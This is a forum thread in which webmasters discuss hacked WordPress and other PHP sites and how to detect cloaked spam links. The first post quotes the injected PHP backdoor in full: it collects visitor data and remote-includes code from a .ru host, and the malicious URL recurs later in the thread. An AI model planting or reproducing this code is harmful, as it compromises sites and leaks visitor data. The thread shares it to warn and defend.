Site hacked ~ Check your Google cache NOW!

I've had a WHOLE bunch of sites comprimised recently...

I'm pretty stumped as to how they actually managed to hack the site, but I can tell you now that it's pretty malicious stuff...

Basically, they're putting this bit of code onto the pages of my sites...

<?php echo get_option('siteurl'); ?>

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}

Code (markup):

I think they're using all of that info to get access to machine user information to set up a network of drone machines that they can control...

I have NO IDEA how they are getting this code on my site ~ an SQL Injection seems to be a potential way, but having gone through my site(s - there are a few they've done this to) log files I can't see any of the tell tale signs of an SQL injestion.

Saying that I can't get the POST information in the log files so I'm not sure...

Anyway...

Aside from capturing that information, they are also putting links on the pages and cloaking them to google.

They are pulling the links from this location (This link may time out)....
http:// user7.phpinclude.ru/?d3d3LndlYWx0aGVzdGVlbS5vcmc=.d3d3LndlYWx0aGVzdGVlbS5vcmc=.Lw==.Z29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=.ODAuMTY5LjE5Mi44Mg==:1)

http://www.google.co.uk/search?q=phpinclude.ru

There are nearly 400,000 records containing this site ~ that's where the information is being sent to (specifically user7.phpinclude.ru)

I urge you to CHECK THE CACHE ON YOUR SITES NOW!

If you are open source software you could be at risk ~ they seem to be targetting the widely used open source stuff from what I can tell...

Really guys CHECK YOUR CACHE NOW!

They still have access to the sites too ~ every time I remove the code, it's back again a short while later (It took about an hour last time).

I've lost thousands because of this....

Don't let it happen to you too.

CHECK YOUR GOOGLE CACHE!

 

Damn that's bad.

Are you saying we should check the text version of Google's cache of our own pages for links to those geezers? Or any links we don't recognise for that matter?

 

Check any source code on your sites, and what comes up on your sites when you change your user agent to googlebot (googlebot/2.1 (+http://www.google.com/bot.html))...

It's pretty malicious stuff and at this stage as I don't have any idea how the site was infiltrated I suggest that you all CHECK YOUR CACHE!

 

is the open source software you use uptodate?

 

My particular sites that were hacked were all running various versions of WP...

If you click the google search link, you'll see that some people are using phpBB, some Gallery (sourceforge) ~ it's all open source, widely used software...

I'm not saying that it is reserved to open source stuff only, but I would check any site you're running that uses php.

 

I get these fucking probers all day every day looking for voulnerable files, mostly indeed from OS software because it's obviously easier to find holes.

That's the reason I ALWAYS rename key folders and files; probing doesn't work that way - what they look for returns 404 so they assume you don't run that software and go away. I can highly recommend it.

 

Either by checking the cache, which was fetched by Googlebot, or by installing a FF extension where you can spoof your user agent.

 

Either will work fine, the user agent switcher plugin for Firefox can be found here.

Don't forget to switch it back when you're done though

 

Getting deindexed for cloaking could also be a sign I guess..

 

Yes ~ I've noticed a SEVERE drop in rankings as a result of the outbound links on the page (It's p0rn and H4cker type stuff)...

If anyone at the big G is reading this, please discount ANY LINKS to these sites

user7.phpinclude.ru/?d3d3LndlYWx0aGVzdGVlbS5vcmc=.d3d3LndlYWx0aGVzdGVlbS5vcmc=.Lw==.Z29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=.ODAuMTY5LjE5Mi44Mg==:1)

 

I think you can run this search

site:www.sglinux.com/ phpinclude.ru

in google replacing the sglinux site with your own and it should display

ie.
http://www.google.co.uk/search?hl=en&q=site:www.sglinux.com/+phpinclude.ru&meta=

 

Oliver,

Are the sites on a shared or dedicated host?

 

Shared, but it's not restricted to one server.

 

No, that search wont work in all cases

 

Yeah sorry, that search is only showing the sites where the hack hasn't worked 100% (where errors are being displayed)...

If it worked right, there will be no reference to phpinclude.ru, other than the base64 encoded reference in the pre-parsed php (dXNlcjcucGhwaW5jbHVkZS5ydQ==)...

In other words, there are LOADS of sites out there, that just don't realise that they've been hacked.

 

What sould i be looking for

What on earth does that mean

I look forward to your replys

Jamie

 

It means.

Change your browser useragent to googlebot/2.1 (+http://www.google.com/bot.html)

And you can do that by using the Firefox user agent switcher that I linked to previously.
http://chrispederick.com/work/useragentswitcher/

Then look at your sites ~ If there are any weird links on the pages, you've been affected.

 

Are they putting them in sitewide or on individual pages (or in the template)

ie. If you check your index and its fine, should you go deeper

 

Screw it, here you go guys

http://72.14.207.104/search?client=safari&rls=en&q=cache:burntplanet.com&ie=UTF-8&oe=UTF-8

Try looking for something like this